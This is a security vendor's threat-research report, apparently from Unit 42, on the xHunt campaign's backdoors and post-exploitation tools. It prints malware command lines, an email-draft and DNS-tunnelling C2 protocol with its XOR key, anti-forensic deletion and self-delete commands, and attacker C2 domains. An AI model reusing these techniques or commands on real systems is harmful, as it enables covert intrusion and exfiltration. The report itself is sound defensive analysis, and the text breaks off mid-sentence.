{
	"id": "558b4de8-6730-4aea-839b-2cea002f12dd",
	"created_at": "2026-04-06T00:09:37.439205Z",
	"updated_at": "2026-04-10T03:37:37.112279Z",
	"deleted_at": null,
	"sha1_hash": "8760851e40ff9b001aaa6128c13b4b1a7b5e52ba",
	"title": "xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1556325,
	"plain_text": "xHunt Campaign: Attacks on Kuwait Shipping and Transportation\r\nOrganizations\r\nBy Robert Falcone, Brittany Barbehenn\r\nPublished: 2019-09-23 · Archived: 2026-04-05 16:12:43 UTC\r\nExecutive Summary\r\nBetween May and June 2019, Unit 42 observed previously unknown tools used in the targeting of transportation and\r\nshipping organizations based in Kuwait.\r\nThe first known attack in this campaign targeted a Kuwait transportation and shipping company in which the actors installed\r\na backdoor tool named Hisoka. Several custom tools were later downloaded to the system in order to carry out post-exploitation activities. All of these tools appear to have been created by the same developer. We were able to collect several\r\nvariations of these tools including one dating back to July 2018.  \r\nThe developer of the collected tools used character names from the anime series Hunter x Hunter, which is the basis for the\r\ncampaign name “xHunt.” The names of the tools collected include backdoor tools Sakabota, Hisoka, Netero and Killua.\r\nThese tools not only use HTTP for their command and control (C2) channels, but certain variants of these tools use DNS\r\ntunneling or emails to communicate with their C2 as well. While DNS tunneling as a C2 channel is fairly common, the\r\nspecific method in which this group used email to facilitate C2 communications has not been observed by Unit 42 in quite\r\nsome time. This method uses Exchange Web Services (EWS) and stolen credentials to create email “drafts” to communicate\r\nbetween the actor and the tool. In addition to the aforementioned backdoor tools, we also observed tools referred to as Gon\r\nand EYE, which provide the backdoor access and the ability to carry out post-exploitation activities. \r\nThrough comparative analysis, we identified related activity also targeting Kuwait between July and December 2018, which\r\nwas recently reported by IBM X-Force IRIS. 
While there are no direct infrastructure overlaps between the two campaigns,\r\nhistorical analysis shows that the 2018 and 2019 activities are likely related. \r\nActivity Overview\r\nOn May 19, 2019, we observed a malicious binary named inetinfo.sys installed on a system at an organization within the\r\ntransportation and shipping sector of Kuwait. The file inetinfo.sys is a variant of a backdoor called Hisoka, specifically\r\nnoted as version 0.8 within the code. Unfortunately, we do not have telemetry on how the actor gained initial access to the\r\nsystem to install the Hisoka backdoor. \r\nWithin two hours of gaining access to the system through Hisoka, the actor deployed two additional tools named Gon and\r\nEYE, whose names were based on the filenames Gon.sys and EYE.exe. At a high level, the Gon tool allows the actor to scan\r\nfor open ports on remote systems, upload and download files, take screenshots, find other systems on the network, run\r\ncommands on remote systems and create a Remote Desktop Protocol  (RDP) session. The actor can use Gon as a command-line utility or by using a Graphical User Interface (GUI), as seen in Figure 1.\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/\r\nPage 1 of 22\n\nFigure 1. Gon’s GUI\r\nThe actor uses the EYE tool as a failsafe while they are logged into the system via RDP, as the tool will kill all processes\r\ncreated by the actor and remove other identifying artifacts if a legitimate user logs in. Please reference the Appendix for\r\nmore detailed information on Gon and EYE.\r\nBy hunting within our data set, we were able to identify a second Kuwait organization also in the transportation and shipping\r\nindustry targeted by the same threat group. Between June 18-30, 2019, threat actors installed the Hisoka tool. This time\r\nversion 0.9, which contained the filename netiso.sys. 
On June 18, this file was observed being transferred to another system\r\nvia the Server Message Block (SMB) protocol from an internal IT service desk account. Shortly after, a file named otc.dll\r\nwas seen transferred in the same manner. The otc.dll file is a tool named Killua, a simple backdoor that allows an actor\r\nto issue commands from a C2 server to run on the infected system by communicating back and forth using DNS tunneling.\r\nBased on string comparisons, we believe with high confidence that the same developer created both the Killua and Hisoka\r\ntools. We first observed Killua in June 2019, leading us to believe that Killua is a possible evolution of Hisoka. Details on the\r\nKillua tool are included in the Appendix. \r\nOn June 30, we observed related activity that was quite interesting, as the actor used a third-party help desk service account\r\nto copy the files to an additional system on the network. This activity began with the transfer of another Hisoka v0.9 file,\r\nfollowed by two different Killua files within a 30-minute timeframe.\r\nThe tools identified in the aforementioned activities appear to be created by the same developer, all of which are either\r\nnamed after characters from Hunter x Hunter or contain some other reference to the anime show.\r\nHisoka Email-Based C2\r\nDuring our analysis, we identified two different versions of Hisoka, specifically v0.8 and v0.9, both installed onto the\r\nnetwork of two Kuwait organizations. Both versions contain command sets that allow the actor to control a compromised\r\nsystem. In both versions, the actor can communicate via a command and control (C2) channel that uses either HTTP or DNS\r\ntunneling. However, v0.9 also added the ability for an email-based C2 channel. A more detailed analysis of the two\r\nvariants can be found in the Appendix. 
\r\nThe email-based C2 communications capability added to Hisoka v0.9 relies on Exchange Web Services (EWS) to use a\r\nlegitimate account on an Exchange server in order to allow the actor to communicate with Hisoka. The malware attempts to\r\nlog into an Exchange server using supplied credentials and uses EWS to send and receive emails in order to establish\r\ncommunications between the target and the actor. However, the communications channel does not actually send and receive\r\nemails like other email-based C2 channels we have seen in the past. Instead, the channel relies on creating email drafts that\r\nthe Hisoka malware and the actor will process in order to exchange data back and forth. By using email drafts as well as the\r\nsame legitimate Exchange account to communicate, no emails will be detected outbound or received inbound. \r\nThe C2 channel leveraging EWS interacts with the mailbox of the legitimate account over an encrypted channel, as the\r\nrequests to the EWS application programming interface (API) uses HTTPS. To enable the email-based C2 channel, the actor\r\nwill provide -E EWS \u003cdata\u003e on the command line followed by data structured as follows: \r\n\u003cusername\u003e;\u003cpassword\u003e;\u003cdomain for Exchange server\u003e;\u003cExchange version (2010|2013)\u003e\r\nThe username and password must be a valid account on the Exchange server. We were able to test this functionality in our\r\nlab environment by creating an account named “hisoka” with the password “pass123!”. Using the -E EWS command and the\r\nfollowing string, we were able to enable the C2 channel: \r\nhisoka;pass123!;mail.contoso.com;2010\r\nTo initiate communications, Hisoka notifies the actor that it is ready to receive commands by creating an initial email draft\r\nthat is analogous to the beacon in other command and control channels. 
The initial email draft contains the subject “Present”\r\nwith an empty email body and an email address in the “To” field that consists of an identifier unique to the compromised system\r\n(“ABCDEF” in our testing) followed by “@contoso.com”. Figure 2 shows the initial draft email created by Hisoka viewed\r\nby logging into the account via Outlook Web App.\r\nFigure 2. Hisoka v0.9 email draft used as a beacon\r\nTo issue commands, the actor will log into the same account and create a draft with the subject “Project” and a specially\r\ncrafted message body that contains the command as an encrypted string. We determined the structure of this message body\r\nby analyzing the code and found that the email must contain the string \u003cbody\u003e with a base64 encoded ciphertext on the\r\nfollowing line. While we have not seen the actor using this email channel for C2, we believe the email was sent as an HTML\r\nemail, as Hisoka will check that the email contains three lines after the \u003cbody\u003e tag. This is done by checking for three\r\ncarriage return characters (\\r), which we speculate is meant to include: one line for the ciphertext, one line for the closing\r\n\u003c/body\u003e tag and the last line for the closing \u003c/html\u003e tag. \r\nThe actor will encrypt the desired command by using the XOR operation on each character with the value 83 (0x53) and\r\nbase64 encoding the ciphertext. Figure 3 shows the email draft we created to test the C2 channel that issues the command C-get C:\\\\Windows\\\\Temp\\\\test.txt, which Hisoka will parse and treat as a command to upload the file at the path\r\nC:\\Windows\\Temp\\test.txt.\r\nFigure 3. 
Email draft used by Hisoka to obtain a command\r\nAfter parsing and running the commands obtained from the draft email containing the subject “Project”, Hisoka will create\r\nanother email draft to send the results of the command to the actor. This email draft will again have “Present” as its subject\r\nwith the same email address constructed with the system’s unique identifier and “@contoso.com” in the “To” field. The\r\nmessage body of the email draft is base64 encoded ciphertext that contains the response or result of the command and uses\r\nthe same XOR cipher with 83 (0x53) as the key used to encrypt the data. In the case of the file upload command, Hisoka\r\nwill attach a file of interest to the email draft as well. Figure 4 shows the email draft created by Hisoka after receiving the\r\nfile upload command noted in Figure 3 above. The email draft has the file test.txt attached and the decoded and decrypted\r\nmessage body is the string [!] C:\\\\Windows\\\\Temp\\\\test.txt Attached.\\r\\n\\t\\t\\t\\t\\t\\t{ Hisoka}.\r\nFigure 4. Hisoka v0.9 email draft used to respond to the upload file command\r\nWhile this is not the first email-based C2 channel we have seen in threat activities, the use of saved drafts and a legitimate\r\nExchange account shared between the malware and the actor is rather uncommon and has not been observed in quite some\r\ntime. \r\nOverlaps in Toolset\r\nDuring our analysis of the malware activities occurring at the Kuwait organizations, we began seeing a trend in string\r\nobservables between Hisoka and other tools identified in this activity. These strings led us to identify a separate tool referred\r\nto as Sakabota by its author with the earliest sample identified around July 2018. 
\r\nWe analyzed dozens of samples during this analysis, which resulted in the identification of two separate campaigns -- one in\r\nmid-to-late 2018 using Sakabota and the other in mid-2019 using Hisoka. Our analysis of the two campaigns revealed that\r\nSakabota is the predecessor to Hisoka, which was first observed in May 2019. By analyzing both Hisoka and Sakabota as\r\nwell as the additional tools identified in the aforementioned activity, we have determined that Sakabota is likely the basis for\r\nthe development of all the tools used in these attack campaigns. \r\nThe Hisoka backdoor tool shares a significant amount of code with Sakabota, which is what leads us to believe that Hisoka\r\nevolved from Sakabota’s codebase. Function and variable names are exactly the same in both Sakabota and\r\nHisoka, which suggests that the same developer created both and spent little effort trying to hide this lineage. The\r\nfollowing screenshot depicts a code comparison for Hisoka and Sakabota showing several variable name overlaps\r\n(“Chenged_Host”, “Host_Port”, etc.) as well as the same general flow by which both tools determine if they should use the\r\nhardcoded C2 domain name or one provided as an argument on the command line. \r\nFigure 5. Sakabota \u0026 Hisoka comparison\r\nWe also observed shared code between Sakabota and the other tools used in the 2019 campaign. For instance, the\r\nSelf_Distruct method in EYE matches the Self_Distruct method in several Sakabota samples, and both tools print the highly\r\nunique string we be wait for you boss !!! to the window. Figure 6 below shows this specific overlap in the Self_Distruct\r\nmethods seen between EYE and Sakabota.\r\nFigure 6. EYE and Sakabota comparison \r\nIn addition to those code overlaps, the string “Sakabota” was also observed numerous times within Hisoka and the post-exploitation tools Gon and EYE observed in the 2019 Kuwait activity. 
First, Hisoka will display usage instructions if\r\nsupplied with the appropriate command-line argument, as seen in Figure 7. The usage instructions contain a changelog at the\r\nbottom that includes the string Compatible with Sakabota v3.2 that suggests a linkage between Hisoka and Sakabota.\r\nThroughout our analysis of all Hisoka samples collected, we observed usage instructions containing references up to\r\nSakabota v3.4.\r\n********************************************\r\n*   ****** Ravolation Hisoka ********      *\r\n*   - General \u0026 AI Improvment              *\r\n*   - DNS A improvment \u0026 HTTP Engine       *\r\n*   - add HTTP Send                        *\r\n*   - Compatible with Sakabota v3.2        *\r\n********************************************\r\nFigure 7. Hisoka usage instructions containing suggested compatibility with Sakabota \r\nThe Gon post-exploitation tool from the 2019 campaign also contains the “Sakabota” string that it uses within the output log\r\nof its scanning. Gon’s scanning functionality will write discovered systems to a file at the path \u003cworking\r\ndirectory\u003e\\wnix\\Scan_Result.txt. When finished scanning, Gon will write a footer that contains the string\r\nSakabota_v0.2.0.0, which suggests it is also related to the Sakabota tool. Figure 8 is an example of the output that Gon will\r\nwrite to the file Scan_Result.txt after successfully finding another system during its scanning activities.\r\n172.16.107[.]140[WIN-\u003credacted\u003e] --\u003e SMB\r\n**************Sakabota_v0.2.0.0*****2019-06-14|#|13:32**************\r\nFigure 8. Example output provided from the Gon post-exploitation tool\r\nThe Sakabota string also appears in the debug paths within EYE and Gon. 
As you can see from the following debug path,\r\nthe EYE tool was compiled in a folder called “Sakabota_Tools”:\r\nZ:\\TOOLS\\Sakabota_Tools\\Utility\\Micosoft_Visual_Studio_2010_Experss\\PRJT\\Sync\\Sakabota\\EYE\\EYE\\obj\\Release\\EYE.pdb\r\nThe following debug path within Gon suggests that it was created on a system using the username “sakabota”, which further\r\nsuggests a relationship between the tools:\r\nC:\\Users\\sakabota\\Desktop\\Gon\\Gon\\obj\\Debug\\Gon.pdb\r\nFinally, we also observed the same legitimate applications plink and dsquery embedded within both Gon and Sakabota,\r\nwhich are used to port forward RDP sessions and to gather information from Active Directory. \r\nWhile there are overlaps in the malware used in both the 2018 and 2019 campaigns, it is unclear whether or not these two\r\ncampaigns were conducted by the same set of operators, only that there is some relationship at the malware development\r\nlevel. \r\nConnection to 2018 Campaign\r\nAfter identifying a relationship between Hisoka and Sakabota, we conducted a search and found several Sakabota samples --\r\nall of which were configured to use the domain pasta58[.]com for their C2 server. During general infrastructure analysis, this\r\ndomain was seen in overlapping infrastructure previously observed in attacks on organizations in Kuwait between April and\r\nNovember 2018. Additional related activity was observed in July 2018, which involved spear-phishing emails that delivered\r\nmacro-enabled documents to install PowerShell-based payloads. We do not have additional telemetry on these attacks at this\r\ntime. 
\r\nThe following domains were identified in relation to pasta58[.]com:\r\nDomain Date Registered Registrant\r\nfirewallsupports[.]com 5/6/2018 - 5/6/2019 Masked\r\nwinx64-microsoft[.]com 7/15/18 - 7/15/19 Masked\r\n6google[.]com 7/31/18 - 7/31/19 Masked\r\nalforatsystem[.]com 5/29/18 - 5/29/19 Masked\r\nwindows64x[.]com 8/18/18 - 8/18/19 Masked\r\nwindows-updates[.]com 1/10/18 - 1/10/19 Masked\r\nmicrosoft-check[.]com 10/10/18 - 10/10/19 Masked\r\npasta58[.]com 12/27/17 - 12/27/18 Masked\r\ncheck-updates[.]com 6/24/18 - 6/24/19 Sofia Weber locas.l[@]yahoo.com\r\ntraveleasy-kw[.]com 6/13/18 - 6/13/19 Masked\r\nTable 1. Domains associated with Sakabota domain pasta58[.]com\r\nAccording to open-source information, the alforatsystem[.]com domain has hosted ZIP archives that contained LNK\r\nshortcut files to execute malicious PowerShell- and VBScript-based Trojans. One of the ZIP archives contained an\r\nexecutable file that beaconed to firewallsupports[.]com. The alforatsystem[.]com domain may be mirroring the Forat\r\nElectronic Systems Co. in Saudi Arabia, although we did not observe any additional Saudi Arabia targeting during our\r\nanalysis.\r\nWhile conducting general pivot analysis on available domain registration details, we also identified the domain\r\nsakabota[.]com whose web server served a page with the title “Outlook Web App” during the time of our analysis. While not\r\na direct overlap, this domain shares similar registrant details as the domain check-updates[.]com. It is of interest to note, this\r\ndomain was registered after the first observed Sakabota sample. \r\nDomain Date Registered Registrant\r\nsakabota[.]com 9/8/18 - 9/8/19 Sofi Weber sofiiiweber[@]keemail.me\r\nTable 2. Sakabota[.]com registration details\r\nLink Analysis\r\nIn several instances, historical infrastructure analysis shows potential overlaps between both Hisoka and Sakabota activities,\r\nas well as with OilRig ISMAgent campaigns and DNS Hijacking activity infrastructure. 
The infrastructure\r\noverlaps involve shared domain resolutions; however, the timing of many of these resolutions is far enough apart to indicate a\r\npotential change in actors using the infrastructure. This infrastructure overlap was also noted in a recent report by IBM X-Force IRIS. While not all-inclusive, the following link analysis graph shows a snapshot of the infrastructure overlaps\r\nobserved:\r\nFigure 9. Infrastructure Link Analysis\r\nConclusion\r\nWhile there are similarities in the targeting of Kuwait organizations, domain naming structure and the underlying toolset\r\nused, it remains unclear at this time if the two campaigns (July to December 2018 and May to June 2019) were conducted by\r\nthe same set of operators. \r\nHistorical infrastructure analysis, as depicted in the link analysis chart (Figure 9), shows a close relationship between Hisoka\r\nand Sakabota infrastructure as well as with known OilRig infrastructure. \r\nDue to these overlaps and the focused targeting of organizations within the transportation and shipping industry in the\r\nMiddle East, we are tracking this activity very closely, and will continue analysis in order to determine a more solid\r\nconnection to known threat groups. \r\nPalo Alto Networks customers are protected from these threats through the following:\r\nCustomers using AutoFocus can view this activity by using the following tags:\r\nxHunt, Sakabota, Hisoka, Killua, Gon, EYE\r\nDNS Tunneling activity referenced in this blog is detected through DNS Security automated detection. \r\nAll tools identified are detected as malicious by WildFire and Traps. \r\nPalo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report with our\r\nfellow Cyber Threat Alliance members. 
CTA members use this intelligence to rapidly deploy protections to their customers\r\nand to systematically disrupt malicious cyber actors. For more information on the Cyber Threat Alliance,\r\nvisit www.cyberthreatalliance.org.\r\nIndicators of Compromise\r\nAll indicators associated with these activities can be found in our GitHub repository here.\r\nAppendix\r\nHisoka v0.8 Analysis\r\nBetween May 2019 and June 2019, we identified seven Hisoka v0.8 samples configured to beacon to the domain\r\nmicrosofte-update[.]com. Each of these samples also contains the following debug path:\r\nC:\\\\Users\\\\bob\\\\Desktop\\\\Hisoka\\\\Hisoka\\\\obj\\\\Debug\\\\inetinfo.sys.pdb\r\nThe file with SHA256 892d5e8e763073648dfebcfd4c89526989d909d6189826a974f17e2311de8bc4 was used for the\r\nanalysis of Hisoka v0.8 below.\r\nHisoka is a backdoor malware that uses both HTTP and DNS tunneling for C2 communication. Communications are\r\nhardcoded into the file and the DNS channel looks for the below IP addresses when resolving the C2 domain: \r\npublic static string Replay_Keyword = \"245.10.10[.]11\";\r\npublic static string Itrupt_Keyword = \"244.10.10[.]10\";\r\npublic static string Instruction_Keyword = \"66.92.110[.]\";\r\nThe last octet in the third IP address above is used for Total_Package_Rows, which tells Hisoka how many IP addresses to treat\r\nas data. \r\nIn order to obtain a command from the C2 channel, the malware will build a string structured as ID:\u003cuniq_ID\u003e-\u003e and send it\r\nwithin a POST request over HTTPS using the following hardcoded user-agent: \r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103\r\nSafari/537.36\r\nIt then treats the C2’s response as a command by confirming that the first character of the string is a “C”. 
It then runs the\r\nremaining data as a command if it does not match one of the following listed arguments:\r\nFigure 10. Hisoka v0.8 screenshot\r\nHisoka will use either DNS queries or HTTP requests to send data to the C2 server depending on which engine is currently\r\nset in its configuration or on the command line. If configured to use HTTP, Hisoka uses the same POST request over HTTPS\r\nas mentioned above with the unique identifier within the \"Accept-Language\" header of the request and the data to send\r\nwithin the POST data. \r\nIf the C2 engine type is \"DNS\", it will use the nslookup application to issue DNS queries that resolve domains constructed as\r\nfollows:\r\n\u003cunique identifier\u003e\u003cencrypted base64 encoded data (24 bytes for \"A\" and 64 characters for \"TXT\" at a time)\u003e.\u003cC2 location\u003e\r\nIn the samples we analyzed, a random value was not included in the subdomain, making it possible that two queries would\r\nhave the same subdomain and be resolved by a cached answer. Through deeper analysis of the malware itself, it appears the\r\ndeveloper did create a variable to store a random number in. However, they forgot to include this value in the actual\r\nsubdomain itself.\r\nHisoka v0.9 Analysis\r\nIn June 2019, we began seeing an updated variant of Hisoka (SHA256:\r\na78bfa251a01bf6f93b4b52b2ef0679e7f4cc8ac770bcc4fef5bb229e2e888b) used against these same organizations. 
We\r\nidentified four samples of this variant that were configured to beacon to the domains google-update[.]com or learn-service[.]com.\r\nWithin this version, the developer removed some functionality from within Hisoka and created a new tool named “Netero”,\r\nwhich includes the removed functionality. Netero is embedded in the Hisoka tool within a resource named msdtd and is\r\nsaved to the system in the event that Hisoka needs to use that functionality. The process of moving the functionality out of\r\nHisoka into another tool suggests the author was seeking a more modular architecture in an attempt to evade detection. The\r\npayload is base64 encoded and stored in the format of a certificate, which Hisoka v0.9 decodes by running certutil.exe -decode \u003ccwd\u003e\\msdtd.txt\r\n\u003ccwd\u003e\\msdtd.sys on the base64 encoded payload.\r\nIn addition to moving the functionality into Netero, Hisoka v0.9 added an email-based C2 communications capability that\r\nsupplements the DNS and HTTPS C2 channels observed in the Hisoka v0.8 samples. It attempts to log into an Exchange\r\nserver using supplied credentials and uses EWS in order to establish communications between the target and the actor.\r\nThe actor must supply the settings via the command line (-E EWS \u003cdata\u003e) structured as follows:\r\n\u003cdomain\\username\u003e;\u003cpassword\u003e;\u003cdomain for Exchange server\u003e;\u003cExchange version (2010|2013)\u003e\r\nIf the actor does not provide a string formatted as above, the following hardcoded data will be used. 
We believe the below\r\nsample data is a leftover artifact from the developer's testing of this capability:\r\nshadow\\\\boss;P@ssw0rd;cas;2013\r\nThis means the default values will use the username \"shadow\\boss\" with the password \"P@ssw0rd\" and attempt\r\nto access the following URL:\r\nhttps://cas/EWS/Exchange.asmx\r\nHisoka will then attempt to log into the Exchange Server using the supplied credentials and check for emails, which it\r\nprocesses as inbound communications from the actor. In order to receive inbound communications, EWS is\r\nused to grab messages within the “Drafts” folder (value 3 in the WellKnownFolderName enum) containing an email thread\r\nnamed “Project”.\r\nFor outbound communications, Hisoka will create an email with the subject “Present”. It will include an encrypted message\r\nin the body of the email and a file will be attached to the email if the C2 issues the ‘file upload’ command. The following\r\nemail address is placed in the “To” field:\r\n\u003cunique identifier\u003e@contoso.com\r\nHisoka does not send the email and instead saves the email in the “Drafts” folder. Using the “Drafts” folder suggests that the\r\nactor could log into the same user account to verify that the email exists and can therefore further validate the ability to\r\nreceive communications from Hisoka. It is also likely that the actor would use the unique identifier in the “To” field to\r\ndetermine which compromised system sent the data via the email C2 channel. \r\nThe observed Hisoka v0.9 samples were configured to beacon to the domain learn-service[.]com and contained the\r\nfollowing arguments: \r\nFigure 11. Hisoka v0.9 screenshot\r\nThe usage details at the bottom of the screenshot suggest that the developer has added a “bypass” to Palo Alto Networks\r\nTraps. 
This indicates that the developer has some level of awareness of the security mechanisms their intended targets are\r\ncurrently deploying.\r\nEYE\r\nEYE is a post-exploitation tool first observed in May 2019. However, it contains a Windows Portable Executable (PE)\r\ncompile time of January 21, 2019. The purpose of this tool is to evade detection by allowing the actor to cover up their\r\nactivities while they are logged into the compromised system in the event that a legitimate user attempts to log in to the\r\nsystem. Unlike Hisoka, which monitors for local logins and RDP sessions and subsequently logs them to the registry for\r\nlater exfiltration, EYE monitors for these logins to kill the processes and delete registry keys and files created during the\r\nactor’s session.\r\nWhen the user runs the EYE application, it requires the user to enter a \"y\" for yes or \"n\" for no in a setting called \"Log off\r\nmode\". \r\nChoose -\u003e Log off Mode  ? :\r\n[y]\r\n[n]\r\nRegardless of the user's input, EYE will start monitoring for inbound login attempts initiated locally or by remote RDP\r\nsessions. It will first display the version number \"v0.1\" followed by ASCII art of an unknown picture. Immediately\r\nfollowing the ASCII art display, the tool will write messages to the console indicating that it is starting to watch for inbound\r\nlogin attempts followed by a list of processes created since the actor executed the EYE tool. Figure 12 shows the output of\r\nthe EYE tool from our testing, which shows several processes created (calc, SnippingTool, etc.) 
while EYE was running\r\nuntil a local login attempt occurred.\r\nv0.1\r\n[ASCII art not recoverable from the extracted text]\r\nStart Watching Without LOG_OFF Mode...\r\niexplore\u003c3408\u003e\r\niexplore\u003c2088\u003e\r\ncmd\u003c2280\u003e\r\nconhost\u003c1056\u003e\r\ncalc\u003c3664\u003e\r\nSnippingTool\u003c3024\u003e\r\nwisptis\u003c768\u003e\r\nSoundRecorder\u003c2996\u003e\r\ncontrol\u003c1292\u003e\r\nrundll32\u003c2436\u003e\r\ndllhost\u003c3996\u003e\r\ndllhost\u003c1096\u003e\r\nTSTheme\u003c3900\u003e\r\ncmd\u003c1884\u003e\r\nwe be wait for you boss !!!\r\nTPAutoConnect\u003c2912\u003e\r\nconhost\u003c2376\u003e\r\ncmd\u003c1200\u003e\r\nconhost\u003c2536\u003e\r\ntaskkill\u003c3336\u003e\r\nFigure 12. EYE process names and IDs seen during the actor’s session prior to inbound login attempts\r\nWhen the local or RDP login attempt occurs, EYE will write the unique string “we be wait for you boss !!!” to the console\r\nbefore starting to clean up the actor’s tracks. To clean up, EYE will terminate all processes created since the actor started the\r\nEYE tool, which effectively closes all applications and tools created by the actor. 
EYE will then delete all recent documents\r\nand files created from jump list usage by running the following command:\r\nDel /F /Q %APPDATA%\\\\Microsoft\\\\Windows\\\\Recent\\\\* \u0026 Del /F /Q\r\n%APPDATA%\\\\Microsoft\\\\Windows\\\\Recent\\\\AutomaticDestinations\\\\* \u0026 Del /F /Q\r\n%APPDATA%\\\\Microsoft\\\\Windows\\\\Recent\\\\CustomDestinations\\\\*\r\nEYE will also delete all values found in the following registry keys and the ‘Default.rdp’ file in the user’s folder to cover up\r\nthe actor’s activity on the system and any RDP sessions opened from the system:\r\nSoftware\\\\Microsoft\\\\Terminal Server Client\\\\Default\r\nSOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\WordWheelQuery\r\nSOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TYPEDPATHS\r\nSoftware\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\RunMRU\r\nEYE will finish by attempting to delete itself from the system by running the following command:\r\ntaskkill /f /im \u003cEYE’s executable filename\u003e \u0026 choice /C Y /N /D Y /T 3 \u0026 Del \"\u003cpath to EYE’s executable\u003e\"\r\nEYE does contain some interesting artifacts such as the presence of the 'ExecuteCommand' method that is never used or\r\ncalled. The presence of this method suggests it is either leftover code from a previous version or an artifact from another\r\ncodebase that this tool is based on. We believe EYE was created using the code of Hisoka and Sakabota, as there are\r\nsignificant overlaps in method and variable names, as well as a reference to Sakabota in the PDB debug path:\r\nZ:\TOOLS\Sakabota_Tools\Utility\Micosoft_Visual_Studio_2010_Experss\PRJT\Sync\Sakabota\EYE\EYE\obj\Release\EYE.pdb\r\nGon\r\nThe Gon tool was also first observed in May 2019 and contains a variety of functionality. 
The majority of this functionality\r\nindicates that it would likely be used as a post-exploitation tool to help an actor carry out activities after gaining access to a\r\nsystem. \r\nGon provides an actor with the ability to scan for open ports on remote systems, upload and download files, take\r\nscreenshots, find other systems on the network, run commands on remote systems using WMI or PSEXEC and create an\r\nRDP session using the plink utility. Gon can be used as a command-line utility or as a desktop application using the\r\nprovided GUI. Using the GUI, Gon can use the “dsquery” tool embedded within it to issue the following commands to\r\nobtain computer, user and group names from Active Directory:\r\nDS.exe computer -limit 0 \u003e computer_DS.txt\r\nDS.exe user -limit 0 \u003e Users_DS.txt\r\nDS.exe group -limit 0 \u003e Group_DS.txt\r\nWhen using the command line, an actor can easily see what functionality exists with Gon, as the \"-help\" command provides\r\na usage output that resembles the following:\r\n___v0.2_              \r\n               /  _____/  ____   ____  \r\n              /   \\  ___ /  _ \\ /    \\\r\n              \\    \\_\\  (  \u003c_\u003e )   |  \\\r\n               \\______  /\\____/|___|  /\r\n                      \\/            \\/  \r\n-Up[-l Path.txt] FOLDER_OR_FILE -C Host;User;Pass [-KWF](kill when Finish) [-DEL](delete when item\r\nupload)\r\n[+] is ftp upload 1_ex=-up my_folder_or_File -KWF -DEL -C server.com;admin;123\r\n2_ex=-up-l my_Path.txt -C server.com;admin;123\r\n-Screen[-up][-s count,seconds] -C Host;User;Pass\r\n[+] Print Screen -up is upload to ftp and delete the file. 
-s will repate and will upload -C Cerdential For Upload via\r\nFTP\r\n-Remote [-P] [Host;user;pass;Wdir] [Code]\r\n[+] wmic to host;user;-P is psexecmode ,pass and save it in Wdir\\Thumb.dll\r\n-Download[-s] URL\r\n[+] http://www.URL , is -s Https will download in same directory\r\n-Scan[-v IP-To][-l Path.txt] [setp] [-A]\r\n[+] Result will be in P.txt,-A is advanced scan but slower, step is number to bruteforce MAX 230 -\u003e ex = -Scan-v\r\n192.168.?.? 8\r\n-Bruter Path.txt username;pass{?} [+][-]\r\n[+] Result will be in N.txt , [+] Write netuse IP,[-] Write nont-netuse IP, Tip = Username \u0026 Password can be read\r\nfrom file\r\n-Rev[-clean][-loop] [V_ip] [port_to_Exit] [server;port]\r\n[+] RDP Revers on loop on every 10 min and with SYSTEM\r\n-Globe[-v p,o-r,t,s] [server]\r\n[+] Scan Global Port 123,443,80,81,23,21,22,20,110,25, v is Custom port\r\n-Done\r\n[+] self Distruct\r\nFigure 13. Command-line output for Gon functionality\r\nTo use the GUI, Gon requires the user to enter the password \"92\" in order to use the utility. After entering the correct\r\npassword, the user is presented with a UI that has an edited image of the Gon and Killua characters from the Hunter x\r\nHunter anime, as seen in Figure 14. \r\nFigure 14. 
Gon’s Graphical User Interface showing a modified image of the Hunter x Hunter characters Gon and Killua\r\nThe GUI contains the same functionality as the command-line option, but also contains a button to enable \"Personal Use\".\r\nThis option disables a timer that will hide the Gon GUI window if the user does not have their cursor within the GUI for 80\r\nseconds (800ms timer interval, checked 100 times). \r\nWhen using the scanning functionality, Gon will write results to \u003cworking directory\u003e\\wnix\\Scan_Result.txt with contents\r\nsuch as:\r\n172.16.107[.]140[WIN-\u003credacted\u003e] --\u003e SMB\r\n**************Sakabota_v0.2.0.0*****2019-06-14|#|13:32************** \r\nThere are significant code overlaps between Gon and Sakabota/Hisoka as well, which suggests the same developer is\r\ninvolved in its development. \r\nKillua \r\nWe observed yet another tool installed at the second Kuwait organization that we believe was created by the author of\r\nHisoka. This tool is referred to as Killua by the author, which is the name of another character in the Hunter x Hunter anime.\r\nKillua functions as a backdoor similar to Hisoka, but unlike its Hisoka cousin, Killua was not developed in C# -- rather it\r\nwas coded in Visual C++. Killua also appears to be newer than known Hisoka samples as Killua samples were not compiled\r\nuntil June 25 and 30, 2019. 
Similar to Hisoka, Killua writes its configuration to the registry using the following registry\r\nkeys:\r\nHKCU\\Control Panel\\International\\_ID: \u003cunique identifier\u003e\r\nHKCU\\Control Panel\\International\\_EndPoint: \"learn-service[.]com\"\r\nHKCU\\Control Panel\\International\\_Resolver_Server: \" \"\r\nHKCU\\Control Panel\\International\\_Response: \"180\"\r\nHKCU\\Control Panel\\International\\_Step: \"3\"\r\nKillua uses DNS tunneling to communicate with its C2 server and can only use DNS queries for tunneling using the built-in\r\n\"nslookup\" tool, which is the same method of sending DNS queries as Hisoka. Killua begins this communication by issuing\r\nan initial beacon query using a unique identifier for the compromised system as the subdomain. During our analysis, we\r\nobserved the unique identifier \"EVcmmi\", which base64 decodes to “Result goes here”. This action results in a beacon that\r\nqueried the following domain:\r\nEVcmmi.learn-service[.]com\r\nDuring our analysis, the DNS server responded back with \"66.92.110[.]4\". In this response, the first three octets signal\r\nKillua to begin sending additional queries in order to receive commands from the C2 DNS server. It will send these\r\ncommands within IPv4 answers to the queries. The fourth octet is used to determine how many DNS queries it needs to\r\nissue in order to receive the entirety of the data from the C2 server. In the case of \"66.92.110[.]4\", this instructed Killua to\r\nissue four queries to receive four IPv4 addresses within the answers provided by the C2 DNS server.\r\nThe four DNS queries issued by the DNS server started 